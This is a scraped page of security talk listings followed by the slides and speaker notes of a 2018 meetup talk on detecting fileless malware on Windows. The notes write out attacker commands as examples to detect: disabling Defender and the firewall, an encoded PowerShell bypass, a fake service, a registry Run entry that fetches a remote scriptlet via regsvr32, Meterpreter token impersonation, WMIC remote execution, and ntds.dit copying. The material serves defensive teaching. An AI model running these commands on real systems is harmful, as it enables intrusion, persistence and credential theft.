Jesse Presented at South Sound Hackers Meetup September 23rd 2018, to provide Security Awareness about Adversary tactics, logs and secure configs for Windows environment.
https://www.meetup.com/SouthSound-hackers-Meetup/events/past/
#CSA #Dehradun
XSS Video POC in Yahoo :
https://www.youtube.com/watch?v=I2WKUJn8P7I
Tapjacking bug poc in Android 6.0 Video :
https://www.youtube.com/watch?v=8BcP3Q4ZWXQ
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...Frans Rosén
Regardless on how sophisticated your framework is, how many layers of firewalls and mitigation techniques that are put in place, there's a common weakness that often gets overlooked: the insecure direct object reference. The flaw exist everywhere: WordPress with username enumeration issues. Twitter where remote attackers could delete credit cards for the ad service and to OculusVR with a horizontal privilege escalation vulnerability which got disclosed recently.
#CSA #Dehradun
XSS Video POC in Yahoo :
https://www.youtube.com/watch?v=I2WKUJn8P7I
Tapjacking bug poc in Android 6.0 Video :
https://www.youtube.com/watch?v=8BcP3Q4ZWXQ
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...Frans Rosén
Regardless on how sophisticated your framework is, how many layers of firewalls and mitigation techniques that are put in place, there's a common weakness that often gets overlooked: the insecure direct object reference. The flaw exist everywhere: WordPress with username enumeration issues. Twitter where remote attackers could delete credit cards for the ad service and to OculusVR with a horizontal privilege escalation vulnerability which got disclosed recently.
What is Win64:Malware-Gen? How does it influence its victims? How to remove Win64 Malware Gen? How to avoid being infected and keep data safe? Get answers here!
This presentation was used in OWASP Taiwan Week 2017 at Taipei & Kaohsiung. It talks about what Cross Site Request Forgery is, what are different ways to prevent it. And how it can be mitigated with OWASP CSRF Protector with just two lines of codes.
Bug Bounty Hunting for Companies & Researchers: Bounty Hunting in Sudan and A...Mazin Ahmed
Bug Bounty Hunting for Companies & Researchers: Bounty Hunting in Sudan and Abroad
http://blog.mazinahmed.net/2016/10/bug-bounty-hunting-swiss-cyber-storm.html
TechCrunch Early Stage 2020 - How to prioritize security at your startupCasey Ellis
Security is one of the most important things for a startup to focus on, but many struggle to dedicate time, resources, or budget to protect against something you never want to happen. How should startups prioritize security, and what do emerging companies need to know?
Bounty Craft: Bug bounty reports how do they work, @sushihack presents at Nu...HackerOne
Hackerone Chief Bounty Officer, Adam Bacchus, a fire breathing, mohawk wearing stud presented his "Bug Bounty Reports - How Do They Work?" at Nullcon 2017 in Goa, India for the Bounty Craft tracks. In this presentation you will learn:
- How to know and research your audience
- What are the atomic materials of a good bug report?
- Good, Bad, and Ugly examples of bug reports (taxi driver anyone?)
- What are some helpful resources
- And more!!
All these juicy details will help you level-up your reporting game and get you MORE bounties, invitation to BETTER programs, and INSANE exposure and love from fellow hackers.
Corncon 2021 - Inside the Unlikely RomanceCasey Ellis
It has been 20 years since Rainforest Puppy released the RFPolicy responsible disclosure policy, 11 years since Google and Facebook brought the concept of bug bounty into the eye of the security industry, and 9 years since Bugcrowd pioneered the concept of inserting a platform in the process to facilitate conversations between builders and breakers in order to level the skill and resourcing playing field against our adversaries.
So, how’s it all going? Did it all turn out to be a “tech company” thing? What have the results, and the impact on cybersecurity defense been on more traditionally conservative industries, like financial services? What can the history of the relationship between helpful hackers and organizations tell us about what we’ll need for the future?
In this talk, Casey Ellis (Founder, Chairman, and CTO of Bugcrowd) will unpack some salient lessons after nearly 10 years building Bugcrowd.
Derbycon 2017: Hunting Lateral Movement For Fun & ProfitMauricio Velazco
After obtaining an initial foothold on an environment, attackers are forced to embark in lateral movement techniques in order to be successful in identifying and exfiltrating sensitive information. To stay ahead of the bad guys, the Blue team needs to have a clear understanding of these techniques as well as the forensic artifacts these techniques leave behind on the victim hosts. Armed with this knowledge, we can proactively hunt for lateral movement in the environment before exfiltration can occur. This presentation will analyze Lateral Movement from both a Red and Blue team perspective and introduce Oriana, a lateral movement hunting tool that can assist the Blue team in catching the adversary.
Matt Johansen, White Hat - Online advertising networks can be a web hacker’s best friend. For mere pennies per thousand impressions (that means browsers) there are service providers who allow you to broadly distribute arbitrary javascript -- even malicious javascript! You are SUPPOSED to use this “feature” to show ads, to track users, and get clicks, but that doesn’t mean you have to abide. Absolutely nothing prevents spending $10, $100, or more to create a massive javascript-driven browser botnet instantly. The real-world power is spooky cool. We know, because we tested it… in-the-wild.
Help mijn website is gehackt - Joomla User Group Den Bosch 2014Peter Martin
Bij een routine controle ontdekte Peter dat de website van een klant enkele vreemde nieuwe bestanden bevatte. Na enkele grondige scans ontdekte hij dat de website was "gehacked".
Wat te doen als je website is gehackt? In deze presentatie (gegeven bij Joomla User Group Den Bosch) bespreekt Peter waarom websites worden gehackt, toont hij enkele website hacks, en laat zien hoe je een website kunt herstellen.
Website security is serious business. Knowing how to maximise your WordPress security can be the difference in losing your business or ruining your reputation. The rise in compromised websites has (and in my opinion will always) increase due to the nature of the Internet’s popularity and the demand from consumerism.
The first security technology bug bounty predated the Internet by over one hundred years: Alfred C Hobbs breaking an unbreakable lock at the Great Exhibition of 1851 for the princely sum of 200 Guineas. With the acceleration of technology adoption, unintended consequences, our adversaries, and the need to quickly understand how "unhackable" things really are, it's safe to say that things have escalated since then.
In 2021, there as many who benefit from engaging the good-faith hacker community as there are folks who find themselves lost in a mish-mash of term confusion, unclear expectations, and general reservations - in spite of the increasingly obvious truth that "it takes an army of allies to overcome an army of adversaries". This breakout is for both.
Casey John Ellis, the Founder, Chairman, and CTO of Bugcrowd, pioneer of the crowdsourced security as-a-service category, and co-founder of The Disclose.io Project will unpack the "family tree" of vulnerability disclosure, bug bounty, and crowdsourced security testing, frame up how we got here, and facilitate a discussion from the group about where it all goes next.
What is Win64:Malware-Gen? How does it influence its victims? How to remove Win64 Malware Gen? How to avoid being infected and keep data safe? Get answers here!
This presentation was used in OWASP Taiwan Week 2017 at Taipei & Kaohsiung. It talks about what Cross Site Request Forgery is, what are different ways to prevent it. And how it can be mitigated with OWASP CSRF Protector with just two lines of codes.
Bug Bounty Hunting for Companies & Researchers: Bounty Hunting in Sudan and A...Mazin Ahmed
Bug Bounty Hunting for Companies & Researchers: Bounty Hunting in Sudan and Abroad
http://blog.mazinahmed.net/2016/10/bug-bounty-hunting-swiss-cyber-storm.html
TechCrunch Early Stage 2020 - How to prioritize security at your startupCasey Ellis
Security is one of the most important things for a startup to focus on, but many struggle to dedicate time, resources, or budget to protect against something you never want to happen. How should startups prioritize security, and what do emerging companies need to know?
Bounty Craft: Bug bounty reports how do they work, @sushihack presents at Nu...HackerOne
Hackerone Chief Bounty Officer, Adam Bacchus, a fire breathing, mohawk wearing stud presented his "Bug Bounty Reports - How Do They Work?" at Nullcon 2017 in Goa, India for the Bounty Craft tracks. In this presentation you will learn:
- How to know and research your audience
- What are the atomic materials of a good bug report?
- Good, Bad, and Ugly examples of bug reports (taxi driver anyone?)
- What are some helpful resources
- And more!!
All these juicy details will help you level-up your reporting game and get you MORE bounties, invitation to BETTER programs, and INSANE exposure and love from fellow hackers.
Corncon 2021 - Inside the Unlikely RomanceCasey Ellis
It has been 20 years since Rainforest Puppy released the RFPolicy responsible disclosure policy, 11 years since Google and Facebook brought the concept of bug bounty into the eye of the security industry, and 9 years since Bugcrowd pioneered the concept of inserting a platform in the process to facilitate conversations between builders and breakers in order to level the skill and resourcing playing field against our adversaries.
So, how’s it all going? Did it all turn out to be a “tech company” thing? What have the results, and the impact on cybersecurity defense been on more traditionally conservative industries, like financial services? What can the history of the relationship between helpful hackers and organizations tell us about what we’ll need for the future?
In this talk, Casey Ellis (Founder, Chairman, and CTO of Bugcrowd) will unpack some salient lessons after nearly 10 years building Bugcrowd.
Derbycon 2017: Hunting Lateral Movement For Fun & ProfitMauricio Velazco
After obtaining an initial foothold on an environment, attackers are forced to embark in lateral movement techniques in order to be successful in identifying and exfiltrating sensitive information. To stay ahead of the bad guys, the Blue team needs to have a clear understanding of these techniques as well as the forensic artifacts these techniques leave behind on the victim hosts. Armed with this knowledge, we can proactively hunt for lateral movement in the environment before exfiltration can occur. This presentation will analyze Lateral Movement from both a Red and Blue team perspective and introduce Oriana, a lateral movement hunting tool that can assist the Blue team in catching the adversary.
Matt Johansen, White Hat - Online advertising networks can be a web hacker’s best friend. For mere pennies per thousand impressions (that means browsers) there are service providers who allow you to broadly distribute arbitrary javascript -- even malicious javascript! You are SUPPOSED to use this “feature” to show ads, to track users, and get clicks, but that doesn’t mean you have to abide. Absolutely nothing prevents spending $10, $100, or more to create a massive javascript-driven browser botnet instantly. The real-world power is spooky cool. We know, because we tested it… in-the-wild.
Help mijn website is gehackt - Joomla User Group Den Bosch 2014Peter Martin
Bij een routine controle ontdekte Peter dat de website van een klant enkele vreemde nieuwe bestanden bevatte. Na enkele grondige scans ontdekte hij dat de website was "gehacked".
Wat te doen als je website is gehackt? In deze presentatie (gegeven bij Joomla User Group Den Bosch) bespreekt Peter waarom websites worden gehackt, toont hij enkele website hacks, en laat zien hoe je een website kunt herstellen.
Website security is serious business. Knowing how to maximise your WordPress security can be the difference in losing your business or ruining your reputation. The rise in compromised websites has (and in my opinion will always) increase due to the nature of the Internet’s popularity and the demand from consumerism.
The first security technology bug bounty predated the Internet by over one hundred years: Alfred C Hobbs breaking an unbreakable lock at the Great Exhibition of 1851 for the princely sum of 200 Guineas. With the acceleration of technology adoption, unintended consequences, our adversaries, and the need to quickly understand how "unhackable" things really are, it's safe to say that things have escalated since then.
In 2021, there as many who benefit from engaging the good-faith hacker community as there are folks who find themselves lost in a mish-mash of term confusion, unclear expectations, and general reservations - in spite of the increasingly obvious truth that "it takes an army of allies to overcome an army of adversaries". This breakout is for both.
Casey John Ellis, the Founder, Chairman, and CTO of Bugcrowd, pioneer of the crowdsourced security as-a-service category, and co-founder of The Disclose.io Project will unpack the "family tree" of vulnerability disclosure, bug bounty, and crowdsourced security testing, frame up how we got here, and facilitate a discussion from the group about where it all goes next.
Co Speaker: Cheryl Biswas
Talk Description:
How about this: a blue team talk given by red teamers. But here’s our rationale - your best defence right now is a strategic offence. The rules of the game have changed and we need to get defence up to speed.
We’ll show you what the key elements are in a good defence strategy; what you can and need to be using to full advantage. We’ll talk about the new “buzzwords” and how they apply: visibility; patterns; big data. There’s a whole lotta data to wrangle, and you aren’t seeing the whole picture if you aren’t doing things right. Threat intel is about getting the big picture as it applies to you. You’ll learn the importance of context and prioritization so that you can manipulate intel feeds to do your bidding. And then we’ll take things further and talk about hunting the adversary, using an update on proven methodologies.
We’ll show you how to understand your data, correlate threats and pin point attacks. Attendees will leave with a new understanding of the resources they have on hand, and how to leverage those into an Adaptive Proactive Defense Strategy.
Given at TRISC 2010, Grapevine, Texas.
http://www.trisc.org/speakers/aditya_sood/#p
The talk sheds light on the new trends of web based malware. Technology and Insecurity goes hand in hand. With the advent of new attacks and techniques the distribution of malware through web has been increased tremendously. Browser based exploits mainly Internet Explorer have given a birth to new world of malware infection. The attackers spread malware elegantly by exploiting the vulnerabilities and drive by downloads. The infection strategies opted by attackers like malware distribution through IFRAME injections and Search Engine Optimization. In order to understand the intrinsic behavior of these web based malware a typical analysis is required to understand the logic concept working behind these web based malwares. It is necessary to dissect these malwares from bottom to top in order to control the devastating behavior. The talk will cover structured methodologies and demonstrate the static, dynamic and behavioral analysis of web malware including PCAP analytics. Demonstrations will prove the fact and necessity of web malware analysis.
DrupalCamp London 2017 - Web site insecurity George Boobyer
Common threats to web security with real world case studies of compromised sites,
- A 'dissection' of a typical common exploit tool and how it operates,
- Simple approaches to mitigating common threats/vulnerabilities,
- Defence in depth – an overview of the various components of web security,
- Drupal specific measures that standard penetration testing often does not account for.
An overview of how to benefit from:
- Security monitoring and log analysis
- Intrusion Detection Systems & Firewalls
- Security headers and Content Security Policies (CSP).
see Drupal Camp London for full details:
http://drupalcamp.london/session/web-site-insecurity-how-your-cms-site-will-get-hacked-and-how-prevent-it
42 - Malware - Understand the Threat and How to RespondThomas Roccia
Malware are becoming more and more complex. In this talk presenting with Jean-Pierre Lesueur at the School 42, we explained the business model behind as well provided an understanding of the Malware Threat.
INTERFACE by apidays 2023 - Securing LLM and NLP APIs, Ads Dawson & Jared Kra...apidays
INTERFACE by apidays 2023
APIs for a “Smart” economy. Embedding AI to deliver Smart APIs and turn into an exponential organization
June 28 & 29, 2023
Securing LLM and NLP APIs: A Journey to Avoiding Data Breaches, Attacks, and More
Ads Dawson, Senior Security Engineer at Cohere
Jared Krause, Senior Full Stack Software Developer at Cohere
------
Check out our conferences at https://www.apidays.global/
Do you want to sponsor or talk at one of our conferences?
https://apidays.typeform.com/to/ILJeAaV8
Learn more on APIscene, the global media made by the community for the community:
https://www.apiscene.io
Explore the API ecosystem with the API Landscape:
https://apilandscape.apiscene.io/
This presentation by Morris Kleiner (University of Minnesota), was made during the discussion “Competition and Regulation in Professions and Occupations” held at the Working Party No. 2 on Competition and Regulation on 10 June 2024. More papers and presentations on the topic can be found out at oe.cd/crps.
This presentation was uploaded with the author’s consent.
Acorn Recovery: Restore IT infra within minutesIP ServerOne
Introducing Acorn Recovery as a Service, a simple, fast, and secure managed disaster recovery (DRaaS) by IP ServerOne. A DR solution that helps restore your IT infra within minutes.
0x01 - Newton's Third Law: Static vs. Dynamic AbusersOWASP Beja
f you offer a service on the web, odds are that someone will abuse it. Be it an API, a SaaS, a PaaS, or even a static website, someone somewhere will try to figure out a way to use it to their own needs. In this talk we'll compare measures that are effective against static attackers and how to battle a dynamic attacker who adapts to your counter-measures.
About the Speaker
===============
Diogo Sousa, Engineering Manager @ Canonical
An opinionated individual with an interest in cryptography and its intersection with secure software development.
Sharpen existing tools or get a new toolbox? Contemporary cluster initiatives...Orkestra
UIIN Conference, Madrid, 27-29 May 2024
James Wilson, Orkestra and Deusto Business School
Emily Wise, Lund University
Madeline Smith, The Glasgow School of Art
Have you ever wondered how search works while visiting an e-commerce site, internal website, or searching through other types of online resources? Look no further than this informative session on the ways that taxonomies help end-users navigate the internet! Hear from taxonomists and other information professionals who have first-hand experience creating and working with taxonomies that aid in navigation, search, and discovery across a range of disciplines.
2. > Following presentation contains my thoughts, ideas
and opinions. They do not represent those of my
current or past employers.
> Any events, characters and company depicted in the
course of this presentation are purely fictitious. Any
similarity to actual events, characters and company
is merely coincidental.
> Do not use these tactics/techniques presented for
evil.
WARNING…
Disclaimer
3. > What you will walk away from here with?
– This slide deck!
– Security awareness of Fileless Malware Adversary
Tactics/Techniques and Detection.
– Motivation to look at OS configurations (registry/services),
logs, and simulate adversaries to secure your part of the
world.
Security depends on US!
Together We Can Defend!
4. > Jesse Moore
– Threat Detection and Response Team @ UW Medicine.
– Certs are to many to list (lookup me up on LinkedIn)
> GIAC Certified Forensics Analysts, GIAC Penetration Tester
https://www.linkedin.com/in/jessefmoore/
Jessefmoore+DFIR@gmail.com
Security Enablers, Just someone wanting to assist with
Security!
WHO Am I?
5. – Security awareness of some Fileless Malware Adversary Tactics/Techniques
– In Memory attacks
– Empire demo
– Phish with SET
– Abuse Windows features
– PTH Demo
– CIS-CAT (Configuration Assessment Tool) demo
> Awareness of defense approaches
– Logging
> PowerShell Script Block
> CMD line audit
> Sysmonv8 logging
> Registry Monitoring
– Motivation to secure your part of the world
> CIS Hardening URL
> US-Cert Advisory
> Logging Cheat Sheets
> References to Adversary tactics.
…
What is the Agenda?
6. What’s that?¯_(ツ)_/¯
whoami
systeminfo
Qwinsta
taskkill /f /im MsMpEng.exe
netsh advfirewall set currentprofile state off
netsh advfirewall set domainprofile state off
netsh advfirewall set allprofiles state off
powershell -nop -exec bypass -EncodedCommand
"cABvAHcAZQByAHMAaABl”
sc.exe create "svvchost" binpath= "c:tempsvvchost.exe"
sc.exe start svvchost
reg add
HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun
/v "start" /d "regsvr32 /u /s
/i:http://www.wingtiptoys.com/stext.sct scrobj.dll" /f
Reference: https://gallery.technet.microsoft.com/Azure-Security-Center-549aa7a4
7. > What is the biggest Risk to org?
– Taken together, phishing and pretexting represent 93% of
all social breaches in the study. Email was the most
common attack vector (96%)
…
Okay, lets talk stats
Verizon Data Breach Investigations Report
(DBIR)
Phish Creds -> OWA -> phish other users
Phish Creds -> OWA -> Find Systems account
has access
Phish Creds -> VPN -> workstation
Phish Creds -> System Access-> Mimikatz –
Phish Creds -> System Access->Empire
Phish Creds -> System Access-> Meterpreter
Phish Creds -> System Access-> BloodHound
https://www.cobaltstrike.com/downloads/csmanual311.pdf
9. > Configuration Best Practices
Must be aware to be prepared.
Being prepared… What can I do?
Reference: https://learn.cisecurity.org/cis-cat-landing-page
10. CIS Controls: 9 Limitation and Control of Network Ports, Protocols, and
Services
CIS_Microsoft_Windows_10_Enterprise_Release_1607_Benchmark_v1.2
11. > Patch Software
– US-Cert Advisories: https://www.us-cert.gov/mailing-lists-and-feeds
Must be aware to be prepared.
Being Aware something is bad
29. Use BloodHound to visualize accounts that may lead to
sensitive stuff leaving your organization at Risk.
Token Stealing? Monitor who logs on where
& when?
Reference: Derivative Local Admin http://www.sixdub.net/?p=591
31. > Invoke-NinjaCopy.ps1
– Copy ntds.dit database along with SYSTEM HIV
– Detection: PowerShellv5 Script Block Logging
> DCSync (Empire)
– Detection: https://github.com/shellster/DCSYNCMonitor
> Compare HaveIBeenPWND ntlm hashses with
ntds.dit ntlm hashes
– Detection: https://jacksonvd.com/pwned-passwords-and-
ntlm-hashes/
Get the hashes
What about Active Directory?
32. > Monitor the Registry!
– Disable Reversible Encryption
– Disable LM and NTLM
– Disable Credential Caching
– LSA Protection Against Connection of Third-Party Modules
– Disabling Wdigest
– Prevent the use of saved passwords
– Credential Guard (Win10 Enterprise/srvr2016)
– Protected Users Security Group (Windows Server 2012 R2)
– Prevent Getting Debug Privileges
> disable SeDebugPrivilege. You can do it using GPO (local or domain one). Go to Computer Configuration ->
Windows Settings -> Security Settings -> Local Policies -> User Rights Assignment and enable the policy
Debug Program.
…
Mimikatz Detections
33. > Detect Cobalt Strike Beacon
– https://blog.jpcert.or.jp/2018/08/volatility-plugin-for-
detecting-cobalt-strike-beacon.html
– SMB pipes from workstation to workstations
> Detect Meterpreter
– - rundll32.exe process , Poker ports, Network analysis
– EDRs. Childproc_name:”rundll32.exe” AND
digsig_result:”Unsigned” AND path:cwindows*
– https://github.com/countercept/memory-carving-scripts
…
Fileless Malware Detections
34. > DEMO
– Fileless Malware demo:
> Detect Empire in memory with PowerShell script
https://screencast-o-matic.com/u/vqZ/Find_FilelessMal
Empire & Get-InjectedThread to detect
Perform Memory (Empire) Attack &
Detection!
35. > DEMO
– Phish Attack (How bad can it be?)
> Kali SET Phishing:
https://screencast-o-matic.com/u/vqZ/Kali_SET_PhishingWebsite
SET (PHISH) Attack
Perform the PHISH attack!
36. > Windows
– Abusing Windows
> https://screencastomatic.com/u/vqZ/MulitRelayResponderSetup
– https://www.youtube.com/watch?v=rjRDsXp_MNk (10:36 minutes)
– https://screencast-o-matic.com/u/vqZ/BuildMacroExploitEmpire
– https://screencast-o-matic.com/u/vqZ/CrackHashResponder
> https://screencast-o-matic.com/u/vqZ/PTH-Detection
Need to Monitor systems to find evidence of activities…
What other attacks are there?
37. > DEMO
– Automatically find Secure configs
> CIS-CAT: Configuration Assessment Tool.
> https://screencast-o-matic.com/u/vqZ/CIS-
CAT
Reference:
> https://learn.cisecurity.org/cis-cat-landing-page
Windows Config Benchmarks for Defense!
Perform OS Configuration Hardening!
40. Example of stuff in this Github
Who can help in the Community? Hunt
Scripts
https://github.com/johnfranolich/Hunting-Scripts
41. > Time
> Baseline (what is normal?)
> Outliers (Frequency analysis)
> Hunt behavior more than signatures
> Build out capabilities (identify/expose)
> Research… (understand attacks and build defense)
…
Look for Behavior
44. – Best Practices
> Center for Internet Security https://www.cisecurity.org/cybersecurity-
best-practices/ (disable services/ports not needed (LLMNR))
> Check what Logs you need on system
https://www.imfsecurity.com/compare/
> Enable PowerShell Script Block Logging (find Evil):
https://www.fireeye.com/blog/threat-
research/2016/02/greater_visibilityt.html
> Monitor your Registry, WMI, cmdlines, API, exe
> Hunt More Behavior and some signatures
– Know Thy Enemy
> Mitre ATT&CK https://attack.mitre.org/wiki/ATT%26CK_Matrix
> Check Defenses with repo https://redcanary.com/atomic-red-team/
> Cobalt Strike Manual for TTPs:
https://www.cobaltstrike.com/downloads/csmanual311.pdf
Monitor your logs, Have Secure Configurations, Patch (Or
Place in a Secure Enclave) & Simulate Adversary Tactics
to obtain Detection mechanisms (behaviors)…
The End… until next time.
Thank you for attending!
We will provide this slide deck, so we may concentrate on this being more of a conversation among friends and peers. Kind of like a MeetUp
Hope this arms everyone with resources to detect, and secure UW devices.
https://www.cisecurity.org/
https://www.microsoft.com/en-us/msrc/technical-security-notifications
https://www.us-cert.gov/mailing-lists-and-feeds
https://www.malwarearchaeology.com/cheat-sheets
Free Tools to Review/Monitor/Log: Sysmon, Audit logs cmd line auditing, PowerShell
https://ics-cert.us-cert.gov/sites/default/files/recommended_practices/RP_Patch_Management_S508C.pdf
In_memory – Empire, CobaltStrike, Meterpreter
Registry-resident – store bad scripts in registry such as Autoruns
Script-based –such as vbs, powershell, Python, etc
Living off the Land – Abusing Windows features such as LLMNR, or CertUtil, Psexec, WMI, PowerShell, WMIC, and .net API
¯\_(ツ)_/¯
The steps that follow assumes that the attacker has already compromised the machine… Now the attacker is moving to the installation and exploitation phase
Powershell –nop –exec bypass –Enc “powershell -command "& { iwr https://download.sysinternals.com/files/Sysmon.zip -OutFile c:\temp\svchost.exe }" “
Sc = Now the attacker is going to try to establish persistence by creating a service based on the file that was downloaded (Beacon(Reverse Shell))
REG ADD: The intent is to simulate a download -To continue establishing persistence, the attacker can also add a registry entry to download a malicious program once the computer starts (Beacon again?)
“fileless” is actually referring to are the techniques attackers use to avoid dropping malicious executable files on disk to Evade Detection.
Reference: https://www.barkly.com/what-are-fileless-attack-techniques
Phish Creds -> System Access-> BloodHound to map attack path
https://www.cobaltstrike.com/downloads/csmanual311.pdf Page 10 for image.
Cobalt strike has a gui that conveys credential snowball attack.
What is CS?
CS is adversary simulation software designed to execute targeted attacks and emulate the post-exploitation action of advanced threat actors.
https://www.cobaltstrike.com/downloads/csmanual311.pdf page 6
If you learn nothing else from me other than to check the manual and Blogs post by Raphael my time here is worth it.
https://www.cobaltstrike.com/aggressor-script/index.html
Aggressor Script is a scripting language for red team operations and adversary simulations inspired by scriptable IRC clients and bots
https://github.com/bluscreenofjeff/AggressorScripts
CIS-CATS installation: https://screencast-o-matic.com/watch/cFj6F7qjgf
Logging:
Sysmon, Audit logging, Registry Monitoring, PowerShell Script Block Logging, cmd line auditing (Log-MD and CIS has a list)
OWASP 2017 has a requirement for logging now.
Going a step further: Act like the adversary and create detections for Network attacks, Host attacks
Living off the Land: DCOM, WMI, API, EXE attacks, Website attacks, AD attack
Audit:
Navigate to the UI Path articulated in the Remediation section and confirm it is set as prescribed. This group policy setting is backed by the following registry location:
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient:EnableMulticast
Remediation:
To establish the recommended configuration via GP, set the following UI path to Enabled:
Computer Configuration\Policies\Administrative Templates\Network\DNS Client\Turn off multicast name resolution
Impact:
In the event DNS is unavailable a system will be unable to request it from other systems on the same subnet.
https://screencastomatic.com/u/vqZ/MulitRelayResponderSetup
https://screencast-o-matic.com/u/vqZ/CrackHashResponder
Patch Software (WSUS, SCCM, PowerShell, etc):
https://ics-cert.us-cert.gov/advisories-by-vendor
Not vulnerability or Risk management: https://www.us-cert.gov/sites/default/files/resources/ncats/RVA-Sample-Report.pdf
Even Twitter works for latest and greatest tactics…. SubTee and the whole SpectorOps crew.
useful for understanding security risk against known adversary behavior, for planning security improvements, and verifying defenses work as expected.
Who has played or is going next year to any CCDC competitions? On the Blue Team?
The mission of the Collegiate Cyber Defense Competition (CCDC) system is to provide institutions with an information assurance or computer security curriculum a controlled, competitive environment to assess their student's depth of understanding and operational competency in managing the challenges inherent in protecting a corporate network infrastructure and business information systems.
CCDC Events are designed to:
Build a meaningful mechanism by which institutions of higher education may evaluate their programs
Provide an educational venue in which students are able to apply the theory and practical skills they have learned in their course work
Foster a spirit of teamwork, ethical behavior, and effective communication both within and across teams
Create interest and awareness among participating institutions and students
Need to monitor Registry and Installed Patches because adversaries are looking and leaving signs of activities.
Check autoruns for startup programs.
Check Hash of known files that might be backdoored with extra malious program. Think BackdoorFactory!
These reg keys will basically spawn your programs, as you can see this is very dangerous because these keys are very used by viruses and Trojans.
[HKEY_CLASSES_ROOT\exefile\shell\open\command] @="\"%1\" %*" [HKEY_CLASSES_ROOT\comfile\shell\open\command] @="\"%1\" %*" [HKEY_CLASSES_ROOT\batfile\shell\open\command] @="\"%1\" %*" [HKEY_CLASSES_ROOT\htafile\Shell\Open\Command] @="\"%1\" %*" [HKEY_CLASSES_ROOT\piffile\shell\open\command] @="\"%1\" %*" [HKEY_LOCAL_MACHINE\Software\CLASSES\batfile\shell\open\command] @="\"%1\" %*" [HKEY_LOCAL_MACHINE\Software\CLASSES\comfile\shell\open\command] @="\"%1\" %*" [HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\open\command] @="\"%1\" %*" [HKEY_LOCAL_MACHINE\Software\CLASSES\htafile\Shell\Open\Command] @="\"%1\" %*" [HKEY_LOCAL_MACHINE\Software\CLASSES\piffile\shell\open\command] @="\"%1\" %*" The key should have a value of Value "%1 %*", if this is changed to "server.exe %1 %*", the
server.exe will be executed EVERYTIME an exe/pif/com/bat/hta is executed.
https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6
https://gist.github.com/bohops/f722f1a54d9ac1070350bdcaf2da618b
Via Windows 7: https://www.youtube.com/watch?v=VytjV2kPwSg
Via Task manager: https://www.youtube.com/watch?v=oPk5off3yUg
Via Windows Server 2012 R2 https://www.youtube.com/watch?v=OgsoIoWmhWw
This technique is in memory
\\https://live.sysinternals.com/ logonsessions.exe
OK enough CCDC stuff back to “What even looks bad? (Adversary Tactics)”
Attackers who successfully installed such malware in a network will attempt to take control of the system within the network in the following sequence in order to collect confidential information, etc.
1. Initial investigation: Collect information of the infected machine
2. Reconnaissance: Look for information saved in the machine and remote machines within the network
3. Spread of infection: Infect the machine with other malware or try to access other machines
Yes even if you don’t have central logging…
What can you do?
Enable Logging (even if you don’t have a central logging
Windows PowerShell cheat sheet
https://www.malwarearchaeology.com/cheat-sheets
https://www.malwarearchaeology.com/cheat-sheets
You really need to log to find Bad! How do you find them?? Advance solution is Sysmon.
Download and execute code: Powershell, Wscript, mshta, rundll32, Wmic, regsvr32, MSBuild, etc.
Client side attacks are very common for a foothold into network.
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1193/T1193.md#atomic-test-1---download-spearphishing-attachment
https://github.com/redcanaryco/atomic-red-team
https://github.com/redcanaryco/atomic-red-team/tree/master/atomics
Detect .NET with Event Tracing for Windows (ETW) providers
https://countercept.com/blog/detecting-malicious-use-of-net-part-2/
This could be used as a mechanism to discover suspicious assembly loading on a system, either in the form of legitimate assemblies being used maliciously, or potentially custom assemblies being loaded purely in memory.
GhostPack Review https://youtu.be/eoh_yqLOenI
https://posts.specterops.io/ghostpack-d835018c5fc4
https://github.com/GhostPack
SharpUp is a C# port of various PowerUp functionality
SharpDump is a C# port of PowerSploit's Out-Minidump.ps1
SharpRoast is a C# port of various PowerView's Kerberoasting functionality
SafetyKatz is a combination of slightly modified version of @gentilkiwi's Mimikatz project and @subTee's .NET PE Loader
https://astr0baby.wordpress.com/2018/07/25/ghostpack-quick-review/
Now for more Defender resources such as SANS Forensics!
https://www.sans.org/security-resources/posters/
Until October something… I think 8th??? Not sure!
Remote Access: RDP Map Network Shares with net use
Remote Execution: PSEXEC, Schedule Tasks, Services, WMI/WMIC, PowerShell Remoting
https://raw.githubusercontent.com/olafhartong/sysmon-modular/master/attack_matrix/demo.gif
https://github.com/olafhartong/sysmon-modular/tree/master/attack_matrix
https://www.malwarearchaeology.com/cheat-sheets
See it LIVE:
https://mitre.github.io/attack-navigator/enterprise/#layerURL=https%3A%2F%2Fraw.githubusercontent.com%2Folafhartong%2Fsysmon-modular%2Fmaster%2Fattack_matrix%2FSysmon-modular.json&scoring=false&clear_annotations=false
https://github.com/olafhartong/sysmon-modular/tree/master/attack_matrix
T1204 ATT&CK –Monitor the execution of and command-line arguments
What about no logs things like stealing tokens?
meterpreter > use incognito, meterpreter > impersonate_token CAMPUS\\Administrator, Then add more accounts, Mount file C:\Windows\system32>net use Z: \\192.168.140.137\C, Then Copy file copy "y:\Software\MALSoftware\MALClient\Installers\windows\installer\setup.exe" z:\Windows\system32\ Then run process shell wmic /node:host process call create “c:\windows\temp\malware.exe”
Derivative Local Admin http://www.sixdub.net/?p=591
Abusing GPO Control
https://wald0.com/?p=179
https://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
Policy Location: Computer Configuration\Preferences\Control Panel Settings\Local Users and Groups
Abuse: Add new local admin account.
Policy Location: Computer Configuration\Preferences\Control Panel Settings\Scheduled Tasks
Abuse: Deploy a new evil scheduled task (ie: PowerShell download cradle).
Policy Location: Computer Configuration\Preferences\Control Panel Settings\Services Abuse: Create and configure new evil services.
Policy Location: Computer Configuration\Preferences\Windows Settings\Registry
Abuse: Update specific registry keys. Very useful for disabling security mechanisms, or triggering code execution in any number of ways.
Policy Location: Computer Configuration\Policies\Windows Settings\Scripts (startup/shutdown)
Abuse: Configure and deploy evil startup scripts. Can run scripts out of GPO directory, can also run PowerShell commands with arguments
Here you can see how an account can be a Member of a group that has access to a computer that another account session is on that they could steal the token and get to other computers.
User Sessions (where people are logged on) so we can steal password or impersonate: Andy Robbins BloodHound Session collection works: https://www.youtube.com/watch?v=q86VgM2Tafc
Need to copy the ntds.dit file using vssadmin c:\windows\ntds.dit
OR just use Invoke-NinjaCopy
